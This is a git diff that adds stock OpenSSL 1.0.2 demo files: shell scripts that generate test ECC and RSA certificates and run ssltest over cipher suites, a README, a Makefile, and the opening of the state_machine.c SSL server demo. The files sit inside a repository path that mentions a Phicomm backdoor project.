diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECCcertgen.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECCcertgen.sh
new file mode 100755
index 0000000..a47b8bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECCcertgen.sh
@@ -0,0 +1,164 @@
+#!/bin/sh
+
+# For a list of supported curves, use "apps/openssl ecparam -list_curves".
+
+# Path to the openssl distribution
+OPENSSL_DIR=../..
+# Path to the openssl program
+OPENSSL_CMD=$OPENSSL_DIR/apps/openssl
+# Option to find configuration file
+OPENSSL_CNF="-config $OPENSSL_DIR/apps/openssl.cnf"
+# Directory where certificates are stored
+CERTS_DIR=./Certs
+# Directory where private key files are stored
+KEYS_DIR=$CERTS_DIR
+# Directory where combo files (containing a certificate and corresponding
+# private key together) are stored
+COMBO_DIR=$CERTS_DIR
+# cat command
+CAT=/bin/cat
+# rm command
+RM=/bin/rm
+# mkdir command
+MKDIR=/bin/mkdir
+# The certificate will expire these many days after the issue date.
+DAYS=1500
+TEST_CA_CURVE=secp160r1
+TEST_CA_FILE=secp160r1TestCA
+TEST_CA_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test CA (Elliptic curve secp160r1)"
+
+TEST_SERVER_CURVE=secp160r2
+TEST_SERVER_FILE=secp160r2TestServer
+TEST_SERVER_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Server (Elliptic curve secp160r2)"
+
+TEST_CLIENT_CURVE=secp160r2
+TEST_CLIENT_FILE=secp160r2TestClient
+TEST_CLIENT_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Client (Elliptic curve secp160r2)"
+
+# Generating an EC certificate involves the following main steps
+# 1. Generating curve parameters (if needed)
+# 2. Generating a certificate request
+# 3. Signing the certificate request 
+# 4. [Optional] One can combine the cert and private key into a single
+#    file and also delete the certificate request
+
+$MKDIR -p $CERTS_DIR
+$MKDIR -p $KEYS_DIR
+$MKDIR -p $COMBO_DIR
+
+echo "Generating self-signed CA certificate (on curve $TEST_CA_CURVE)"
+echo "==============================================================="
+$OPENSSL_CMD ecparam -name $TEST_CA_CURVE -out $TEST_CA_CURVE.pem
+
+# Generate a new certificate request in $TEST_CA_FILE.req.pem. A 
+# new ecdsa (actually ECC) key pair is generated on the parameters in
+# $TEST_CA_CURVE.pem and the private key is saved in $TEST_CA_FILE.key.pem
+# WARNING: By using the -nodes option, we force the private key to be 
+# stored in the clear (rather than encrypted with a password).
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_CA_DN" \
+    -keyout $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -newkey ec:$TEST_CA_CURVE.pem -new \
+    -out $CERTS_DIR/$TEST_CA_FILE.req.pem
+
+# Sign the certificate request in $TEST_CA_FILE.req.pem using the
+# private key in $TEST_CA_FILE.key.pem and include the CA extension.
+# Make the certificate valid for 1500 days from the time of signing.
+# The certificate is written into $TEST_CA_FILE.cert.pem
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_CA_FILE.req.pem \
+    -extfile $OPENSSL_DIR/apps/openssl.cnf \
+    -extensions v3_ca \
+    -signkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_CA_FILE.cert.pem
+
+# Display the certificate
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CA_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CA_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_CA_FILE.pem
+$CAT $KEYS_DIR/$TEST_CA_FILE.key.pem >> $COMBO_DIR/$TEST_CA_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_CA_FILE.req.pem
+
+echo "GENERATING A TEST SERVER CERTIFICATE (on elliptic curve $TEST_SERVER_CURVE)"
+echo "=========================================================================="
+# Generate parameters for curve $TEST_SERVER_CURVE, if needed
+$OPENSSL_CMD ecparam -name $TEST_SERVER_CURVE -out $TEST_SERVER_CURVE.pem
+
+# Generate a new certificate request in $TEST_SERVER_FILE.req.pem. A 
+# new ecdsa (actually ECC) key pair is generated on the parameters in
+# $TEST_SERVER_CURVE.pem and the private key is saved in 
+# $TEST_SERVER_FILE.key.pem
+# WARNING: By using the -nodes option, we force the private key to be 
+# stored in the clear (rather than encrypted with a password).
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_SERVER_DN" \
+    -keyout $KEYS_DIR/$TEST_SERVER_FILE.key.pem \
+    -newkey ec:$TEST_SERVER_CURVE.pem -new \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+# Sign the certificate request in $TEST_SERVER_FILE.req.pem using the
+# CA certificate in $TEST_CA_FILE.cert.pem and the CA private key in
+# $TEST_CA_FILE.key.pem. Since we do not have an existing serial number
+# file for this CA, create one. Make the certificate valid for $DAYS days
+# from the time of signing. The certificate is written into 
+# $TEST_SERVER_FILE.cert.pem
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_SERVER_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_SERVER_FILE.pem
+$CAT $KEYS_DIR/$TEST_SERVER_FILE.key.pem >> $COMBO_DIR/$TEST_SERVER_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+echo "GENERATING A TEST CLIENT CERTIFICATE (on elliptic curve $TEST_CLIENT_CURVE)"
+echo "=========================================================================="
+# Generate parameters for curve $TEST_CLIENT_CURVE, if needed
+$OPENSSL_CMD ecparam -name $TEST_CLIENT_CURVE -out $TEST_CLIENT_CURVE.pem
+
+# Generate a new certificate request in $TEST_CLIENT_FILE.req.pem. A 
+# new ecdsa (actually ECC) key pair is generated on the parameters in
+# $TEST_CLIENT_CURVE.pem and the private key is saved in 
+# $TEST_CLIENT_FILE.key.pem
+# WARNING: By using the -nodes option, we force the private key to be 
+# stored in the clear (rather than encrypted with a password).
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_CLIENT_DN" \
+	     -keyout $KEYS_DIR/$TEST_CLIENT_FILE.key.pem \
+	     -newkey ec:$TEST_CLIENT_CURVE.pem -new \
+	     -out $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
+# Sign the certificate request in $TEST_CLIENT_FILE.req.pem using the
+# CA certificate in $TEST_CA_FILE.cert.pem and the CA private key in
+# $TEST_CA_FILE.key.pem. Since we do not have an existing serial number
+# file for this CA, create one. Make the certificate valid for $DAYS days
+# from the time of signing. The certificate is written into 
+# $TEST_CLIENT_FILE.cert.pem
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_CLIENT_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_CLIENT_FILE.pem
+$CAT $KEYS_DIR/$TEST_CLIENT_FILE.key.pem >> $COMBO_DIR/$TEST_CLIENT_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/README
new file mode 100644
index 0000000..71c070a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/README
@@ -0,0 +1,15 @@
+Scripts for using ECC ciphersuites with test/testssl
+(these ciphersuites are described in the Internet Draft available at
+http://www.ietf.org/internet-drafts/draft-ietf-tls-ecc-03.txt).
+
+Use ECCcertgen.sh, RSAcertgen.sh, ECC-RSAcertgen.sh to generate
+root, client and server certs of the following types:
+
+     ECC certs signed with ECDSA
+     RSA certs signed with RSA
+     ECC certs signed with RSA
+
+Afterwards, you can use ssltest.sh to run the various tests;
+specify one of the following options:
+
+     aecdh, ecdh-ecdsa, ecdhe-ecdsa, ecdh-rsa, ecdhe-rsa
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/RSAcertgen.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/RSAcertgen.sh
new file mode 100755
index 0000000..0cb0153
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/RSAcertgen.sh
@@ -0,0 +1,121 @@
+#!/bin/sh
+
+# For a list of supported curves, use "apps/openssl ecparam -list_curves".
+
+# Path to the openssl distribution
+OPENSSL_DIR=../..
+# Path to the openssl program
+OPENSSL_CMD=$OPENSSL_DIR/apps/openssl
+# Option to find configuration file
+OPENSSL_CNF="-config $OPENSSL_DIR/apps/openssl.cnf"
+# Directory where certificates are stored
+CERTS_DIR=./Certs
+# Directory where private key files are stored
+KEYS_DIR=$CERTS_DIR
+# Directory where combo files (containing a certificate and corresponding
+# private key together) are stored
+COMBO_DIR=$CERTS_DIR
+# cat command
+CAT=/bin/cat
+# rm command
+RM=/bin/rm
+# mkdir command
+MKDIR=/bin/mkdir
+# The certificate will expire these many days after the issue date.
+DAYS=1500
+TEST_CA_FILE=rsa1024TestCA
+TEST_CA_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test CA (1024 bit RSA)"
+
+TEST_SERVER_FILE=rsa1024TestServer
+TEST_SERVER_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Server (1024 bit RSA)"
+
+TEST_CLIENT_FILE=rsa1024TestClient
+TEST_CLIENT_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Client (1024 bit RSA)"
+
+# Generating an EC certificate involves the following main steps
+# 1. Generating curve parameters (if needed)
+# 2. Generating a certificate request
+# 3. Signing the certificate request 
+# 4. [Optional] One can combine the cert and private key into a single
+#    file and also delete the certificate request
+
+$MKDIR -p $CERTS_DIR
+$MKDIR -p $KEYS_DIR
+$MKDIR -p $COMBO_DIR
+
+echo "Generating self-signed CA certificate (RSA)"
+echo "==========================================="
+
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_CA_DN" \
+    -keyout $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -newkey rsa:1024 -new \
+    -out $CERTS_DIR/$TEST_CA_FILE.req.pem
+
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_CA_FILE.req.pem \
+    -extfile $OPENSSL_DIR/apps/openssl.cnf \
+    -extensions v3_ca \
+    -signkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_CA_FILE.cert.pem
+
+# Display the certificate
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CA_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CA_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_CA_FILE.pem
+$CAT $KEYS_DIR/$TEST_CA_FILE.key.pem >> $COMBO_DIR/$TEST_CA_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_CA_FILE.req.pem
+
+echo "GENERATING A TEST SERVER CERTIFICATE (RSA)"
+echo "=========================================="
+
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_SERVER_DN" \
+    -keyout $KEYS_DIR/$TEST_SERVER_FILE.key.pem \
+    -newkey rsa:1024 -new \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_SERVER_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_SERVER_FILE.pem
+$CAT $KEYS_DIR/$TEST_SERVER_FILE.key.pem >> $COMBO_DIR/$TEST_SERVER_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+echo "GENERATING A TEST CLIENT CERTIFICATE (RSA)"
+echo "=========================================="
+
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_CLIENT_DN" \
+	     -keyout $KEYS_DIR/$TEST_CLIENT_FILE.key.pem \
+	     -newkey rsa:1024 -new \
+	     -out $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_CLIENT_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_CLIENT_FILE.pem
+$CAT $KEYS_DIR/$TEST_CLIENT_FILE.key.pem >> $COMBO_DIR/$TEST_CLIENT_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ssltest.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ssltest.sh
new file mode 100755
index 0000000..923ca43
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ssltest.sh
@@ -0,0 +1,188 @@
+#! /bin/sh
+# Tests ECC cipher suites using ssltest. Requires one argument which could
+# be aecdh or ecdh-ecdsa or ecdhe-ecdsa or ecdh-rsa or ecdhe-rsa.
+# A second optional argument can be one of ssl2 ssl3 or tls1
+
+if [ "$1" = "" ]; then
+  (echo "Usage: $0 test [ protocol ]"
+   echo "   where test is one of aecdh, ecdh-ecdsa, ecdhe-ecdsa, ecdh-rsa, ecdhe-rsa"
+   echo "   and protocol (optional) is one of ssl2, ssl3, tls1"
+   echo "Run RSAcertgen.sh, ECC-RSAcertgen.sh, ECCcertgen.sh first."
+  ) >&2
+  exit 1
+fi
+
+
+OPENSSL_DIR=../..
+CERTS_DIR=./Certs
+SSLTEST=$OPENSSL_DIR/test/ssltest
+# SSL protocol version to test (one of ssl2 ssl3 or tls1)"
+SSLVERSION=
+
+# These don't really require any certificates
+AECDH_CIPHER_LIST="AECDH-AES256-SHA AECDH-AES128-SHA AECDH-DES-CBC3-SHA AECDH-RC4-SHA AECDH-NULL-SHA"
+
+# These require ECC certificates signed with ECDSA
+# The EC public key must be authorized for key agreement.
+ECDH_ECDSA_CIPHER_LIST="ECDH-ECDSA-AES256-SHA ECDH-ECDSA-AES128-SHA ECDH-ECDSA-DES-CBC3-SHA ECDH-ECDSA-RC4-SHA ECDH-ECDSA-NULL-SHA"
+
+# These require ECC certificates.
+# The EC public key must be authorized for digital signature.
+ECDHE_ECDSA_CIPHER_LIST="ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-DES-CBC3-SHA ECDHE-ECDSA-RC4-SHA ECDHE-ECDSA-NULL-SHA"
+
+# These require ECC certificates signed with RSA.
+# The EC public key must be authorized for key agreement.
+ECDH_RSA_CIPHER_LIST="ECDH-RSA-AES256-SHA ECDH-RSA-AES128-SHA ECDH-RSA-DES-CBC3-SHA ECDH-RSA-RC4-SHA ECDH-RSA-NULL-SHA"
+
+# These require RSA certificates.
+# The RSA public key must be authorized for digital signature.
+ECDHE_RSA_CIPHER_LIST="ECDHE-RSA-AES256-SHA ECDHE-RSA-AES128-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-RSA-RC4-SHA ECDHE-RSA-NULL-SHA"
+
+# List of Elliptic curves over which we wish to test generation of
+# ephemeral ECDH keys when using AECDH or ECDHE ciphers
+# NOTE: secp192r1 = prime192v1 and secp256r1 = prime256v1
+#ELLIPTIC_CURVE_LIST="secp112r1 sect113r2 secp128r1 sect131r1 secp160k1 sect163r2 wap-wsg-idm-ecid-wtls7 c2pnb163v3 c2pnb176v3 c2tnb191v3 secp192r1 prime192v3 sect193r2 secp224r1 wap-wsg-idm-ecid-wtls10 sect239k1 prime239v2 secp256r1 prime256v1 sect283k1 secp384r1 sect409r1 secp521r1 sect571r1"
+ELLIPTIC_CURVE_LIST="sect163k1 sect163r1 sect163r2 sect193r1 sect193r2 sect233k1 sect233r1 sect239k1 sect283k1 sect283r1 sect409k1 sect409r1 sect571k1 sect571r1 secp160k1 secp160r1 secp160r2 secp192k1 prime192v1 secp224k1 secp224r1 secp256k1 prime256v1 secp384r1 secp521r1"
+
+DEFAULT_CURVE="sect163r2"
+
+if [ "$2" = "" ]; then
+    if [ "$SSL_VERSION" = "" ]; then
+	SSL_VERSION=""
+    else
+	SSL_VERSION="-$SSL_VERSION"
+    fi
+else
+    SSL_VERSION="-$2"
+fi
+
+#==============================================================
+# Anonymous cipher suites do not require key or certificate files
+# but ssltest expects a cert file and complains if it can't
+# open the default one.
+SERVER_PEM=$OPENSSL_DIR/apps/server.pem
+
+if [ "$1" = "aecdh" ]; then
+for cipher in $AECDH_CIPHER_LIST
+do
+    echo "Testing $cipher"
+    $SSLTEST $SSL_VERSION -cert $SERVER_PEM -cipher $cipher 
+done
+#--------------------------------------------------------------
+for curve in $ELLIPTIC_CURVE_LIST
+do
+    echo "Testing AECDH-NULL-SHA (with $curve)"
+    $SSLTEST $SSL_VERSION -cert $SERVER_PEM \
+	-named_curve $curve -cipher AECDH-NULL-SHA
+done
+
+for curve in $ELLIPTIC_CURVE_LIST
+do
+    echo "Testing AECDH-RC4-SHA (with $curve)"
+    $SSLTEST $SSL_VERSION -cert $SERVER_PEM \
+	-named_curve $curve -cipher AECDH-RC4-SHA
+done
+fi
+
+#==============================================================
+# Both ECDH-ECDSA and ECDHE-ECDSA cipher suites require 
+# the server to have an ECC certificate signed with ECDSA.
+CA_PEM=$CERTS_DIR/secp160r1TestCA.pem
+SERVER_PEM=$CERTS_DIR/secp160r2TestServer.pem
+CLIENT_PEM=$CERTS_DIR/secp160r2TestClient.pem
+
+if [ "$1" = "ecdh-ecdsa" ]; then
+for cipher in $ECDH_ECDSA_CIPHER_LIST
+do
+    echo "Testing $cipher (with server authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-cipher $cipher
+
+    echo "Testing $cipher (with server and client authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-c_cert $CLIENT_PEM -client_auth \
+	-cipher $cipher
+done
+fi
+
+#==============================================================
+if [ "$1" = "ecdhe-ecdsa" ]; then
+for cipher in $ECDHE_ECDSA_CIPHER_LIST
+do
+    echo "Testing $cipher (with server authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-cipher $cipher -named_curve $DEFAULT_CURVE
+
+    echo "Testing $cipher (with server and client authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-c_cert $CLIENT_PEM -client_auth \
+	-cipher $cipher -named_curve $DEFAULT_CURVE
+done
+
+#--------------------------------------------------------------
+for curve in $ELLIPTIC_CURVE_LIST
+do
+    echo "Testing ECDHE-ECDSA-AES128-SHA (2-way auth with $curve)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-c_cert $CLIENT_PEM -client_auth \
+	-cipher ECDHE-ECDSA-AES128-SHA -named_curve $curve 
+done
+fi
+
+#==============================================================
+# ECDH-RSA cipher suites require the server to have an ECC
+# certificate signed with RSA.
+CA_PEM=$CERTS_DIR/rsa1024TestCA.pem
+SERVER_PEM=$CERTS_DIR/sect163r1-rsaTestServer.pem
+CLIENT_PEM=$CERTS_DIR/sect163r1-rsaTestClient.pem
+
+if [ "$1" = "ecdh-rsa" ]; then
+for cipher in $ECDH_RSA_CIPHER_LIST
+do
+    echo "Testing $cipher (with server authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-cipher $cipher
+
+    echo "Testing $cipher (with server and client authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-c_cert $CLIENT_PEM -client_auth \
+	-cipher $cipher
+done
+fi
+
+#==============================================================
+# ECDHE-RSA cipher suites require the server to have an RSA cert.
+CA_PEM=$CERTS_DIR/rsa1024TestCA.pem
+SERVER_PEM=$CERTS_DIR/rsa1024TestServer.pem
+CLIENT_PEM=$CERTS_DIR/rsa1024TestClient.pem
+
+if [ "$1" = "ecdhe-rsa" ]; then
+for cipher in $ECDHE_RSA_CIPHER_LIST
+do
+    echo "Testing $cipher (with server authentication)"
+    echo $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-cipher $cipher -named_curve $DEFAULT_CURVE
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-cipher $cipher -named_curve $DEFAULT_CURVE
+
+    echo "Testing $cipher (with server and client authentication)"
+    $SSLTEST $SSL_VERSION -CAfile $CA_PEM \
+	-cert $SERVER_PEM -server_auth \
+	-c_cert $CLIENT_PEM -client_auth \
+	-cipher $cipher -named_curve $DEFAULT_CURVE
+done
+fi
+#==============================================================
+
+
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/Makefile
new file mode 100644
index 0000000..c7a1145
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/Makefile
@@ -0,0 +1,9 @@
+CFLAGS=-I../../include -Wall -Werror -g
+
+all: state_machine
+
+state_machine: state_machine.o
+	$(CC) -o state_machine state_machine.o -L../.. -lssl -lcrypto
+
+test: state_machine
+	./state_machine 10000 ../../apps/server.pem ../../apps/server.pem
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/state_machine.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/state_machine.c
new file mode 100644
index 0000000..2ec196a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/state_machine/state_machine.c
@@ -0,0 +1,407 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Nuron, a leader in hardware encryption technology, generously
+ * sponsored the development of this demo by Ben Laurie.
+ *
+ * See http://www.nuron.com/.
+ */
+
+/*
+ * the aim of this demo is to provide a fully working state-machine
+ * style SSL implementation, i.e. one where the main loop acquires
+ * some data, then converts it from or to SSL by feeding it into the
+ * SSL state machine. It then does any I/O required by the state machine
+ * and loops.
+ *
+ * In order to keep things as simple as possible, this implementation
+ * listens on a TCP socket, which it expects to get an SSL connection
+ * on (for example, from s_client) and from then on writes decrypted
+ * data to stdout and encrypts anything arriving on stdin. Verbose
+ * commentary is written to stderr.
+ *
+ * This implementation acts as a server, but it can also be done for a client.  */
+
+#include <openssl/ssl.h>
+#include <assert.h>
+#include <unistd.h>
+#include <string.h>
+#include <openssl/err.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+/*
+ * die_unless is intended to work like assert, except that it happens always,
+ * even if NDEBUG is defined. Use assert as a stopgap.
+ */
+
+#define die_unless(x)   assert(x)
+
+typedef struct {
+    SSL_CTX *pCtx;
+    BIO *pbioRead;
+    BIO *pbioWrite;
+    SSL *pSSL;
+} SSLStateMachine;
+
+void SSLStateMachine_print_error(SSLStateMachine * pMachine,
+                                 const char *szErr)
+{
+    unsigned long l;
+
+    fprintf(stderr, "%s\n", szErr);
+    while ((l = ERR_get_error())) {
+        char buf[1024];
+
+        ERR_error_string_n(l, buf, sizeof buf);
+        fprintf(stderr, "Error %lx: %s\n", l, buf);
+    }
+}
+
+SSLStateMachine *SSLStateMachine_new(const char *szCertificateFile,
+                                     const char *szKeyFile)
+{
+    SSLStateMachine *pMachine = malloc(sizeof *pMachine);
+    int n;
+
+    die_unless(pMachine);
+
+    pMachine->pCtx = SSL_CTX_new(SSLv23_server_method());
+    die_unless(pMachine->pCtx);
+
+    n = SSL_CTX_use_certificate_file(pMachine->pCtx, szCertificateFile,
+                                     SSL_FILETYPE_PEM);
+    die_unless(n > 0);
+
+    n = SSL_CTX_use_PrivateKey_file(pMachine->pCtx, szKeyFile,
+                                    SSL_FILETYPE_PEM);
+    die_unless(n > 0);
+
+    pMachine->pSSL = SSL_new(pMachine->pCtx);
+    die_unless(pMachine->pSSL);
+
+    pMachine->pbioRead = BIO_new(BIO_s_mem());
+
+    pMachine->pbioWrite = BIO_new(BIO_s_mem());
+
+    SSL_set_bio(pMachine->pSSL, pMachine->pbioRead, pMachine->pbioWrite);
+
+    SSL_set_accept_state(pMachine->pSSL);
+
+    return pMachine;
+}
+
